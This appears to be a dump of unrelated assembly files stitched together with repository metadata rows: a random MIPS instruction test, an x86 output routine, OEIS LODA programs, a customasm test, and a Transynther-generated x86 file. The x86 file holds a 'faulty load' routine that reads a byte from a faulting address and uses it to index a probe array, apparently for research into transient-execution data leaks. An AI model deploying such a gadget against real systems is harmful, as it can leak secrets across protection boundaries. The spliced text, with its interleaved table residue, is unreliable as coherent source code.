bgez $3, TAG564
lui $3, 13
mfhi $1
divu $1, $3
TAG564:
multu $1, $1
mflo $4
sh $1, 0($1)
mflo $4
TAG565:
mflo $4
bgtz $4, TAG566
sra $2, $4, 14
lw $3, 0($4)
TAG566:
bltz $3, TAG567
mtlo $3
subu $4, $3, $3
sh $4, 0($4)
TAG567:
mfhi $3
mthi $3
addi $4, $3, 13
lui $4, 0
TAG568:
mtlo $4
beq $4, $4, TAG569
mtlo $4
mfhi $4
TAG569:
lhu $4, 0($4)
lw $3, 0($4)
mtlo $3
bne $4, $4, TAG570
TAG570:
mtlo $3
lh $1, 0($3)
bgez $1, TAG571
or $1, $1, $1
TAG571:
lui $2, 11
mthi $1
sllv $3, $2, $2
srl $1, $3, 3
TAG572:
mthi $1
bltz $1, TAG573
mtlo $1
bgez $1, TAG573
TAG573:
mthi $1
sll $0, $0, 0
div $1, $1
mflo $4
TAG574:
bgez $4, TAG575
lui $2, 6
multu $2, $2
andi $3, $4, 1
TAG575:
sll $0, $0, 0
sll $0, $0, 0
mflo $2
mthi $2
TAG576:
lui $1, 13
bne $1, $2, TAG577
mflo $1
lb $4, 0($2)
TAG577:
bgtz $4, TAG578
sb $4, 0($4)
sb $4, 0($4)
div $4, $4
TAG578:
lbu $3, 0($4)
sb $3, 0($3)
mflo $4
sb $4, 0($4)
TAG579:
mult $4, $4
addiu $2, $4, 0
slt $2, $4, $2
sh $4, 0($2)
TAG580:
or $4, $2, $2
mthi $2
lui $1, 3
beq $4, $4, TAG581
TAG581:
mflo $3
lui $1, 0
mult $1, $1
lb $4, 0($3)
TAG582:
beq $4, $4, TAG583
slti $4, $4, 13
mtlo $4
divu $4, $4
TAG583:
beq $4, $4, TAG584
mflo $3
sw $3, 0($3)
lhu $4, 0($3)
TAG584:
lui $3, 3
bne $3, $4, TAG585
mfhi $2
bgtz $4, TAG585
TAG585:
sb $2, 0($2)
mflo $3
bgez $3, TAG586
mult $3, $3
TAG586:
lui $2, 9
lui $1, 13
mtlo $2
div $2, $1
TAG587:
divu $1, $1
sll $0, $0, 0
mtlo $1
mthi $1
TAG588:
sll $0, $0, 0
slti $1, $1, 0
nor $4, $1, $1
div $1, $4
TAG589:
bltz $4, TAG590
mult $4, $4
addi $3, $4, 10
sb $3, 0($4)
TAG590:
lui $1, 14
lui $3, 6
bgez $3, TAG591
lui $2, 7
TAG591:
lui $1, 0
bltz $1, TAG592
mflo $3
addu $4, $1, $2
TAG592:
mtlo $4
blez $4, TAG593
mthi $4
mfhi $1
TAG593:
xori $2, $1, 1
blez $2, TAG594
sll $0, $0, 0
mthi $2
TAG594:
bne $2, $2, TAG595
slt $4, $2, $2
srlv $1, $2, $2
sll $0, $0, 0
TAG595:
mult $4, $4
srlv $1, $4, $4
lui $1, 6
sll $0, $0, 0
TAG596:
lhu $3, 0($4)
srlv $3, $4, $3
lui $4, 13
addiu $2, $3, 10
TAG597:
slti $2, $2, 8
mult $2, $2
bltz $2, TAG598
mflo $3
TAG598:
subu $2, $3, $3
bltz $3, TAG599
mfhi $2
mfhi $1
TAG599:
lui $1, 14
divu $1, $1
bgtz $1, TAG600
mfhi $3
TAG600:
lui $2, 10
sll $0, $0, 0
mult $2, $3
bne $3, $2, TAG601
TAG601:
multu $2, $2
sll $0, $0, 0
mflo $1
subu $1, $2, $2
TAG602:
bne $1, $1, TAG603
mtlo $1
sb $1, 0($1)
mult $1, $1
TAG603:
mfhi $4
srav $4, $4, $1
mult $1, $4
lhu $1, 0($4)
TAG604:
bgtz $1, TAG605
srl $4, $1, 6
srlv $3, $4, $1
sb $1, 0($4)
TAG605:
mtlo $3
lui $4, 7
mult $4, $4
sll $0, $0, 0
TAG606:
sll $0, $0, 0
addu $4, $4, $4
bgez $4, TAG607
sll $0, $0, 0
TAG607:
divu $4, $4
sll $0, $0, 0
mtlo $4
lui $4, 2
TAG608:
sll $0, $0, 0
srl $4, $4, 10
mflo $4
mflo $4
TAG609:
mflo $2
sll $0, $0, 0
beq $2, $2, TAG610
mflo $2
TAG610:
bltz $2, TAG611
ori $4, $2, 14
mflo $2
mflo $2
TAG611:
sll $0, $0, 0
lui $3, 4
and $3, $3, $3
lui $3, 11
TAG612:
bgtz $3, TAG613
mtlo $3
bgtz $3, TAG613
or $1, $3, $3
TAG613:
mult $1, $1
nor $1, $1, $1
sh $1, 1($1)
beq $1, $1, TAG614
TAG614:
sll $0, $0, 0
lui $4, 10
sll $0, $0, 0
bne $1, $4, TAG615
TAG615:
sll $0, $0, 0
sll $0, $0, 0
mfhi $4
mtlo $4
TAG616:
bgez $4, TAG617
lui $3, 6
mfhi $4
sw $4, 0($4)
TAG617:
bne $4, $4, TAG618
subu $1, $4, $4
mult $4, $1
bgez $1, TAG618
TAG618:
lui $2, 8
lui $3, 4
divu $3, $2
srl $3, $1, 6
TAG619:
subu $2, $3, $3
multu $2, $2
mfhi $3
srav $4, $3, $3
TAG620:
lh $4, 0($4)
addu $4, $4, $4
blez $4, TAG621
mfhi $1
TAG621:
mfhi $3
lui $2, 5
slti $4, $1, 8
bgez $4, TAG622
TAG622:
div $4, $4
sb $4, 0($4)
mult $4, $4
mflo $2
TAG623:
mfhi $2
lui $4, 9
srl $4, $2, 13
mult $4, $2
TAG624:
bne $4, $4, TAG625
multu $4, $4
lhu $1, 0($4)
mfhi $1
TAG625:
xor $3, $1, $1
srl $2, $3, 3
beq $3, $2, TAG626
mflo $4
TAG626:
mult $4, $4
bgtz $4, TAG627
sw $4, 0($4)
sh $4, 0($4)
TAG627:
beq $4, $4, TAG628
sb $4, 0($4)
mult $4, $4
lui $2, 2
TAG628:
lb $1, 0($2)
beq $2, $2, TAG629
xor $3, $1, $1
beq $1, $3, TAG629
TAG629:
mthi $3
mult $3, $3
sra $1, $3, 7
sllv $3, $1, $1
TAG630:
lui $3, 2
mfhi $2
beq $3, $3, TAG631
multu $2, $3
TAG631:
beq $2, $2, TAG632
sw $2, 0($2)
sll $4, $2, 13
sw $4, 0($4)
TAG632:
sub $4, $4, $4
lui $1, 3
bne $1, $4, TAG633
sll $2, $4, 12
TAG633:
sw $2, 0($2)
mult $2, $2
sh $2, 0($2)
mthi $2
TAG634:
mfhi $3
bgtz $3, TAG635
lui $4, 10
sll $0, $0, 0
TAG635:
lui $2, 10
lbu $1, 0($3)
sll $1, $1, 1
bne $1, $1, TAG636
TAG636:
mult $1, $1
srl $1, $1, 4
multu $1, $1
mthi $1
TAG637:
bltz $1, TAG638
mflo $1
srlv $2, $1, $1
lbu $1, 0($1)
TAG638:
beq $1, $1, TAG639
mtlo $1
bgtz $1, TAG639
lui $1, 14
TAG639:
xori $2, $1, 8
lui $3, 5
lh $4, 0($2)
ori $4, $4, 9
TAG640:
sh $4, -2313($4)
lui $4, 2
bgez $4, TAG641
and $4, $4, $4
TAG641:
sll $0, $0, 0
bne $4, $4, TAG642
srav $4, $4, $4
sll $0, $0, 0
TAG642:
sll $0, $0, 0
lui $4, 7
srl $2, $4, 0
beq $1, $4, TAG643
TAG643:
mthi $2
mthi $2
mfhi $4
divu $2, $4
TAG644:
sll $0, $0, 0
bne $1, $4, TAG645
mfhi $1
mult $1, $1
TAG645:
mflo $2
bgez $1, TAG646
subu $3, $2, $2
addi $3, $1, 9
TAG646:
beq $3, $3, TAG647
sb $3, 0($3)
div $3, $3
lbu $4, 0($3)
TAG647:
lui $1, 2
mult $4, $1
mthi $1
addiu $4, $4, 12
TAG648:
blez $4, TAG649
sll $0, $0, 0
sll $0, $0, 0
mflo $2
TAG649:
sh $2, 0($2)
addu $1, $2, $2
sb $1, 0($1)
srl $4, $1, 10
TAG650:
mfhi $1
lw $4, 0($4)
slt $3, $1, $1
mult $1, $3
TAG651:
addu $3, $3, $3
lhu $3, 0($3)
sw $3, 0($3)
sltiu $1, $3, 3
TAG652:
sltu $2, $1, $1
beq $1, $1, TAG653
mthi $1
blez $2, TAG653
TAG653:
mtlo $2
sw $2, 0($2)
lui $2, 4
bgez $2, TAG654
TAG654:
div $2, $2
sll $0, $0, 0
mtlo $2
lui $3, 13
TAG655:
mflo $3
and $1, $3, $3
mthi $1
sll $0, $0, 0
TAG656:
beq $3, $3, TAG657
sll $0, $0, 0
addu $2, $3, $3
mfhi $2
TAG657:
mthi $2
mfhi $4
sll $0, $0, 0
mthi $2
TAG658:
bltz $1, TAG659
sll $0, $0, 0
sltiu $2, $1, 9
mtlo $1
TAG659:
bne $2, $2, TAG660
sra $1, $2, 14
mtlo $2
lui $3, 7
TAG660:
sllv $3, $3, $3
multu $3, $3
sll $0, $0, 0
bne $3, $3, TAG661
TAG661:
mfhi $3
addu $2, $3, $3
mult $3, $3
xori $4, $3, 4
TAG662:
bltz $4, TAG663
nor $2, $4, $4
mfhi $4
multu $2, $4
TAG663:
sh $4, 0($4)
bltz $4, TAG664
lh $4, 0($4)
bgtz $4, TAG664
TAG664:
lui $2, 3
sltu $4, $2, $2
sll $2, $4, 1
mfhi $2
TAG665:
lui $1, 15
lui $3, 5
blez $3, TAG666
multu $2, $2
TAG666:
sll $0, $0, 0
lui $3, 12
mflo $4
addiu $1, $3, 4
TAG667:
beq $1, $1, TAG668
addiu $4, $1, 15
div $4, $4
lb $1, 0($4)
TAG668:
sll $0, $0, 0
sll $0, $0, 0
addiu $1, $3, 15
blez $3, TAG669
TAG669:
mfhi $1
mfhi $3
srl $1, $3, 12
bne $1, $1, TAG670
TAG670:
subu $1, $1, $1
mflo $1
slt $1, $1, $1
bne $1, $1, TAG671
TAG671:
lbu $1, 0($1)
multu $1, $1
lw $2, 0($1)
mflo $4
TAG672:
mfhi $4
and $1, $4, $4
bgtz $1, TAG673
mthi $4
TAG673:
mfhi $1
lui $2, 2
bltz $1, TAG674
mthi $1
TAG674:
lui $3, 12
xori $1, $2, 13
mthi $3
mflo $4
TAG675:
srav $4, $4, $4
mtlo $4
andi $3, $4, 11
lw $3, 0($3)
TAG676:
sltu $1, $3, $3
mfhi $4
mfhi $4
slt $4, $3, $1
TAG677:
lui $1, 5
lui $4, 8
mthi $4
srav $1, $4, $4
TAG678:
srav $1, $1, $1
or $2, $1, $1
lui $1, 14
sll $0, $0, 0
TAG679:
mfhi $2
or $3, $4, $4
addu $2, $4, $3
sll $0, $0, 0
TAG680:
mflo $3
mfhi $2
lbu $2, 0($3)
mtlo $3
TAG681:
lui $2, 7
mtlo $2
lui $4, 10
sll $0, $0, 0
TAG682:
sll $0, $0, 0
sll $0, $0, 0
lui $1, 6
addiu $4, $4, 14
TAG683:
beq $4, $4, TAG684
slt $2, $4, $4
bgtz $4, TAG684
lui $4, 6
TAG684:
div $4, $4
mfhi $1
lui $1, 3
addiu $1, $1, 5
TAG685:
lui $4, 6
multu $4, $4
lui $4, 7
bltz $4, TAG686
TAG686:
ori $4, $4, 11
mfhi $4
mult $4, $4
sw $4, 0($4)
TAG687:
lhu $2, 0($4)
multu $2, $4
multu $2, $2
subu $2, $2, $2
TAG688:
mthi $2
bgtz $2, TAG689
lui $4, 3
mflo $2
TAG689:
sll $0, $0, 0
divu $4, $4
sll $0, $0, 0
mthi $4
TAG690:
sh $2, -1296($2)
mfhi $1
mfhi $4
sllv $2, $2, $4
TAG691:
sll $0, $0, 0
bgez $2, TAG692
mtlo $3
addi $1, $2, 7
TAG692:
mtlo $1
mfhi $4
sll $0, $0, 0
mflo $4
TAG693:
bgtz $4, TAG694
lui $2, 3
lhu $3, 0($4)
lw $3, 0($3)
TAG694:
mfhi $1
sll $0, $0, 0
bgez $1, TAG695
mthi $1
TAG695:
sltiu $4, $1, 14
sb $1, 0($4)
sll $0, $0, 0
mflo $1
TAG696:
multu $1, $1
sll $0, $0, 0
bne $1, $1, TAG697
mthi $1
TAG697:
srlv $2, $1, $1
bgtz $1, TAG698
subu $3, $2, $2
srlv $2, $2, $1
TAG698:
sra $4, $2, 4
sll $3, $2, 6
sll $0, $0, 0
ori $2, $3, 1
TAG699:
sra $3, $2, 0
mthi $2
andi $1, $2, 1
srlv $2, $1, $1
TAG700:
multu $2, $2
lbu $3, 0($2)
mfhi $3
xori $3, $3, 4
TAG701:
sh $3, 0($3)
bne $3, $3, TAG702
lui $1, 2
sh $3, 0($3)
TAG702:
mthi $1
lui $2, 10
sll $0, $0, 0
bne $1, $1, TAG703
TAG703:
addu $2, $1, $1
srl $3, $1, 6
sll $0, $0, 0
bltz $3, TAG704
TAG704:
mult $3, $3
blez $3, TAG705
nor $3, $3, $3
mthi $3
TAG705:
lui $2, 2
multu $2, $3
slt $3, $3, $3
beq $2, $3, TAG706
TAG706:
mflo $1
subu $3, $3, $1
sll $0, $0, 0
bltz $4, TAG707
TAG707:
sb $4, -12288($4)
lw $1, -12288($4)
lb $4, -1280($1)
blez $4, TAG708
TAG708:
xori $2, $4, 7
lb $4, 0($2)
bne $4, $2, TAG709
lui $2, 12
TAG709:
lui $2, 1
xori $2, $2, 11
divu $2, $2
lui $4, 3
TAG710:
sll $0, $0, 0
sll $0, $0, 0
sll $0, $0, 0
divu $4, $1
TAG711:
lui $2, 4
slt $2, $2, $2
mult $2, $2
srlv $1, $1, $2
TAG712:
bgtz $1, TAG713
mthi $1
sh $1, 0($1)
lhu $2, 0($1)
TAG713:
beq $2, $2, TAG714
slti $2, $2, 0
mfhi $1
mflo $1
TAG714:
bne $1, $1, TAG715
mthi $1
lui $2, 12
bgtz $1, TAG715
TAG715:
mthi $2
div $2, $2
lui $1, 8
sll $0, $0, 0
TAG716:
beq $1, $1, TAG717
addiu $2, $1, 10
lui $1, 0
sb $2, 0($1)
TAG717:
lui $3, 5
divu $1, $1
beq $1, $3, TAG718
mflo $2
TAG718:
xor $2, $2, $2
mthi $2
lui $3, 11
mflo $3
TAG719:
mfhi $1
divu $3, $3
sll $4, $1, 9
lb $1, 0($4)
TAG720:
multu $1, $1
mthi $1
bgez $1, TAG721
lh $4, 0($1)
TAG721:
mflo $3
nor $3, $3, $4
mfhi $1
lui $2, 5
TAG722:
sll $0, $0, 0
sll $0, $0, 0
mflo $3
divu $2, $4
TAG723:
mult $3, $3
srav $1, $3, $3
lui $4, 1
lui $1, 2
TAG724:
addiu $4, $1, 0
sra $1, $1, 2
xori $2, $4, 7
div $1, $1
TAG725:
bne $2, $2, TAG726
lui $1, 10
sll $0, $0, 0
sll $0, $0, 0
TAG726:
sll $0, $0, 0
xori $3, $2, 14
addiu $3, $3, 13
mthi $2
TAG727:
divu $3, $3
mthi $3
bltz $3, TAG728
mtlo $3
TAG728:
divu $3, $3
mthi $3
bne $3, $3, TAG729
addiu $1, $3, 7
TAG729:
bne $1, $1, TAG730
lui $3, 7
slti $1, $3, 13
bgez $1, TAG730
TAG730:
mfhi $3
sll $0, $0, 0
bgtz $3, TAG731
mult $1, $1
TAG731:
sll $0, $0, 0
sll $3, $2, 8
mtlo $2
mfhi $2
TAG732:
lui $1, 1
bgez $1, TAG733
lb $1, 0($2)
mult $2, $1
TAG733:
lb $1, 0($1)
lui $2, 14
bgez $1, TAG734
mthi $2
TAG734:
bne $2, $2, TAG735
nor $4, $2, $2
beq $2, $4, TAG735
lui $1, 4
TAG735:
beq $1, $1, TAG736
lui $4, 13
mfhi $2
lb $1, 0($2)
TAG736:
lui $1, 3
mthi $1
sll $0, $0, 0
bne $1, $3, TAG737
TAG737:
multu $3, $3
mfhi $1
sra $1, $3, 2
andi $1, $3, 1
TAG738:
sub $3, $1, $1
bltz $3, TAG739
mfhi $3
sub $3, $3, $1
TAG739:
divu $3, $3
sll $0, $0, 0
sll $0, $0, 0
blez $3, TAG740
TAG740:
andi $4, $3, 6
sll $0, $0, 0
lui $2, 13
bne $1, $2, TAG741
TAG741:
mflo $2
beq $2, $2, TAG742
mthi $2
ori $2, $2, 0
TAG742:
mtlo $2
addu $2, $2, $2
sh $2, 0($2)
blez $2, TAG743
TAG743:
mtlo $2
mflo $4
div $2, $2
lh $1, 0($4)
TAG744:
slti $4, $1, 10
mflo $1
mfhi $2
bgtz $1, TAG745
TAG745:
ori $4, $2, 15
or $4, $2, $2
mtlo $2
mflo $2
TAG746:
xori $3, $2, 12
mult $3, $3
slti $1, $2, 13
lb $2, 0($1)
TAG747:
lbu $4, 0($2)
divu $2, $2
mthi $2
blez $4, TAG748
TAG748:
nor $1, $4, $4
andi $4, $4, 7
lui $2, 10
xor $2, $4, $2
TAG749:
bltz $2, TAG750
mflo $4
bgtz $2, TAG750
xori $1, $4, 3
TAG750:
nop
nop
test_end:
beq $0, $0, test_end
nop | 11.877605 | 21 | 0.545438 |
adb96444f586ede0994c7e74378a22ac49ec6b57 | 761 | asm | Assembly | res/lib/asm/x86/stdout.asm | Emoun/unsafe-lang | a207b1023bc8f373269d77ff471edef202877714 | [
"MIT"
] | 1 | 2018-06-11T06:57:48.000Z | 2018-06-11T06:57:48.000Z | res/lib/asm/x86/stdout.asm | Emoun/unsafe-lang | a207b1023bc8f373269d77ff471edef202877714 | [
"MIT"
] | null | null | null | res/lib/asm/x86/stdout.asm | Emoun/unsafe-lang | a207b1023bc8f373269d77ff471edef202877714 | [
"MIT"
] | null | null | null |
; Outputs to std out. Currently currupts the stack
; Input: EBX: The address of the first byte to output.
; ECX: The maximum number of bytes to output.
; Output: EAX: The number of bytes written.
; Uses: EAX, ECX, EDX
stdout:
push ebp
mov ebp, esp
push eax ; bWritten (ebp -4): the number of output byte written
push ecx ; save ECX as it migh be corrupted by GetStdHandle
; call GetStdHandle
push STD_OUTPUT_HANDLE
call GetStdHandle ; handle in EAX
pop ecx ; reload
; call WriteFile
push 0 ; overlap
mov edx, ebp
sub edx, 4 ; *bWritten
push edx ; *bWritten
push ecx ; buffer Length
push ebx ; buffer address
push eax ; handle
call WriteFile ; success (!0) in EAX
pop eax ; pop bWritten
pop ebp ; reload caller ebp
ret
| 21.742857 | 64 | 0.701708 |
4222ed99ad241391e7136c215815cd59a2feda74 | 452 | asm | Assembly | oeis/294/A294349.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/294/A294349.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/294/A294349.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A294349: Product of first n terms of the binomial transform of the Lucas numbers (A000032).
; Submitted by Jamie Morken(s1)
; 2,6,42,756,35532,4370436,1407280392,1186337370456,2618246576596392,15128228719573952976,228844715840995186667952,9062937281450932377610903056,939663463215395570775453650652192,255065069445576619918001465293982953056
mod $0,18
mov $1,2
mov $2,2
lpb $0
sub $0,1
add $3,$2
add $2,$3
sub $2,1
mul $1,$2
lpe
mov $0,$1
| 28.25 | 217 | 0.778761 |
fcc0d7a2b4c6c43a20d79012d7786bb56ac79bb1 | 53 | asm | Assembly | tests/inchexstr/6.asm | dommilosz/customasm | d2c55b52d64ea47f5cdb91cd8ec463f37ccadf32 | [
"Apache-2.0"
] | 414 | 2016-10-14T22:39:20.000Z | 2022-03-30T07:52:44.000Z | tests/inchexstr/6.asm | dommilosz/customasm | d2c55b52d64ea47f5cdb91cd8ec463f37ccadf32 | [
"Apache-2.0"
] | 100 | 2018-03-22T16:12:24.000Z | 2022-03-26T09:19:23.000Z | tests/inchexstr/6.asm | dommilosz/customasm | d2c55b52d64ea47f5cdb91cd8ec463f37ccadf32 | [
"Apache-2.0"
] | 47 | 2017-06-29T15:12:13.000Z | 2022-03-10T04:50:51.000Z | #d inchexstr("unk" @ 0xffff) ; error: expected string | 53 | 53 | 0.716981 |
5d57e75ae68262a8788462f66c501ed238321bd0 | 9 | asm | Assembly | src/main/fragment/mos6502-common/vwum1=vwum1_setbyte0_vbuaa.asm | jbrandwood/kickc | d4b68806f84f8650d51b0e3ef254e40f38b0ffad | [
"MIT"
] | 2 | 2022-03-01T02:21:14.000Z | 2022-03-01T04:33:35.000Z | src/main/fragment/mos6502-common/vwum1=vwum1_setbyte0_vbuaa.asm | jbrandwood/kickc | d4b68806f84f8650d51b0e3ef254e40f38b0ffad | [
"MIT"
] | null | null | null | src/main/fragment/mos6502-common/vwum1=vwum1_setbyte0_vbuaa.asm | jbrandwood/kickc | d4b68806f84f8650d51b0e3ef254e40f38b0ffad | [
"MIT"
] | null | null | null | sta {m1}
| 4.5 | 8 | 0.555556 |
11d83f9451d708e2c798c2cfd527fc80d48eeaf5 | 623 | asm | Assembly | programs/oeis/186/A186155.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/186/A186155.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/186/A186155.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A186155: Rank of n^2 when {(1/8)i^3: i>=1} and {j^2>: j>=1} are jointly ranked with (1/8)i^3 after j^2 when (1/8)i^3=j^2. Complement of A186154.
; 2,5,7,9,10,12,14,15,17,19,20,22,24,25,27,28,30,31,33,34,36,37,39,40,42,43,44,46,47,49,50,52,53,54,56,57,59,60,62,63,64,66,67,68,70,71,73,74,75,77,78,79,81,82,83,85,86,87,89,90,91,93,94,95,97,98,99,101,102,103,105,106,107,109,110,111,113,114,115,117,118,119,121,122,123,124,126,127,128,130
mov $2,$0
add $0,1
pow $0,2
mul $0,8
sub $0,1
cal $0,48766 ; Integer part of cube root of n. Or, number of cubes <= n. Or, n appears 3n^2 + 3n + 1 times.
mov $1,$0
add $1,1
add $1,$2
| 47.923077 | 290 | 0.64366 |
a37e1bd3a958f186de95fa8575efeee7a329fcf1 | 2,031 | asm | Assembly | programs/oeis/259/A259110.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/259/A259110.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/259/A259110.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A259110: 2*A000447(n).
; 0,2,20,70,168,330,572,910,1360,1938,2660,3542,4600,5850,7308,8990,10912,13090,15540,18278,21320,24682,28380,32430,36848,41650,46852,52470,58520,65018,71980,79422,87360,95810,104788,114310,124392,135050,146300,158158,170640,183762,197540,211990,227128,242970,259532,276830,294880,313698,333300,353702,374920,396970,419868,443630,468272,493810,520260,547638,575960,605242,635500,666750,699008,732290,766612,801990,838440,875978,914620,954382,995280,1037330,1080548,1124950,1170552,1217370,1265420,1314718,1365280,1417122,1470260,1524710,1580488,1637610,1696092,1755950,1817200,1879858,1943940,2009462,2076440,2144890,2214828,2286270,2359232,2433730,2509780,2587398,2666600,2747402,2829820,2913870,2999568,3086930,3175972,3266710,3359160,3453338,3549260,3646942,3746400,3847650,3950708,4055590,4162312,4270890,4381340,4493678,4607920,4724082,4842180,4962230,5084248,5208250,5334252,5462270,5592320,5724418,5858580,5994822,6133160,6273610,6416188,6560910,6707792,6856850,7008100,7161558,7317240,7475162,7635340,7797790,7962528,8129570,8298932,8470630,8644680,8821098,8999900,9181102,9364720,9550770,9739268,9930230,10123672,10319610,10518060,10719038,10922560,11128642,11337300,11548550,11762408,11978890,12198012,12419790,12644240,12871378,13101220,13333782,13569080,13807130,14047948,14291550,14537952,14787170,15039220,15294118,15551880,15812522,16076060,16342510,16611888,16884210,17159492,17437750,17719000,18003258,18290540,18580862,18874240,19170690,19470228,19772870,20078632,20387530,20699580,21014798,21333200,21654802,21979620,22307670,22638968,22973530,23311372,23652510,23996960,24344738,24695860,25050342,25408200,25769450,26134108,26502190,26873712,27248690,27627140,28009078,28394520,28783482,29175980,29572030,29971648,30374850,30781652,31192070,31606120,32023818,32445180,32870222,33298960,33731410,34167588,34607510,35051192,35498650,35949900,36404958,36863840,37326562,37793140,38263590,38737928,39216170,39698332,40184430,40674480,41168498
mul $0,2
add $0,1
bin $0,3
mul $0,2
mov $1,$0
| 225.666667 | 1,958 | 0.86066 |
1134fdc45419ac42f22c558b77d7e414c1b956a6 | 150 | asm | Assembly | audio/sfx/tink_3.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | 1 | 2022-02-15T00:19:44.000Z | 2022-02-15T00:19:44.000Z | audio/sfx/tink_3.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | null | null | null | audio/sfx/tink_3.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | null | null | null | SFX_Tink_3_Ch5:
duty_cycle 2
pitch_sweep 3, -2
square_note 4, 15, 2, 512
pitch_sweep 2, 2
square_note 8, 14, 2, 512
pitch_sweep 0, 8
sound_ret
| 16.666667 | 26 | 0.726667 |
00b8bfa8c48e7f42d03120db5237ac0d7fd75994 | 5,291 | asm | Assembly | Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xca.log_21829_133.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xca.log_21829_133.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xca.log_21829_133.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r14
push %r15
push %r8
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x207b, %rbp
and %rax, %rax
mov (%rbp), %r8
dec %r9
lea addresses_D_ht+0x794d, %r15
inc %rcx
mov $0x6162636465666768, %r14
movq %r14, %xmm5
movups %xmm5, (%r15)
nop
nop
nop
nop
nop
cmp %r15, %r15
lea addresses_D_ht+0xc67b, %rbp
nop
nop
nop
cmp %r9, %r9
mov (%rbp), %rcx
nop
nop
nop
cmp $39727, %rax
lea addresses_WT_ht+0xdb23, %rsi
lea addresses_WT_ht+0xca7b, %rdi
nop
nop
and %rax, %rax
mov $66, %rcx
rep movsw
nop
nop
inc %r9
lea addresses_A_ht+0x1a7b, %rdi
nop
nop
nop
sub %rsi, %rsi
movb (%rdi), %al
nop
nop
dec %rdi
lea addresses_UC_ht+0xc2e3, %rax
nop
nop
nop
nop
nop
dec %r14
mov (%rax), %edi
nop
nop
xor $56339, %r8
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r9
pop %r8
pop %r15
pop %r14
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r14
push %r15
push %r8
push %rax
push %rdi
// Faulty Load
mov $0x1b8c820000000e7b, %r14
nop
nop
nop
nop
nop
xor %rdi, %rdi
movb (%r14), %r8b
lea oracles, %r13
and $0xff, %r8
shlq $12, %r8
mov (%r13,%r8,1), %r8
pop %rdi
pop %rax
pop %r8
pop %r15
pop %r14
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'size': 16, 'NT': False, 'type': 'addresses_NC', 'same': False, 'AVXalign': False, 'congruent': 0}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_NC', 'same': True, 'AVXalign': False, 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_normal_ht', 'same': False, 'AVXalign': False, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'size': 16, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 0}}
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 11}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 3}, 'dst': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 8}}
{'OP': 'LOAD', 'src': {'size': 1, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 10}}
{'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': True, 'congruent': 3}}
{'00': 21829}
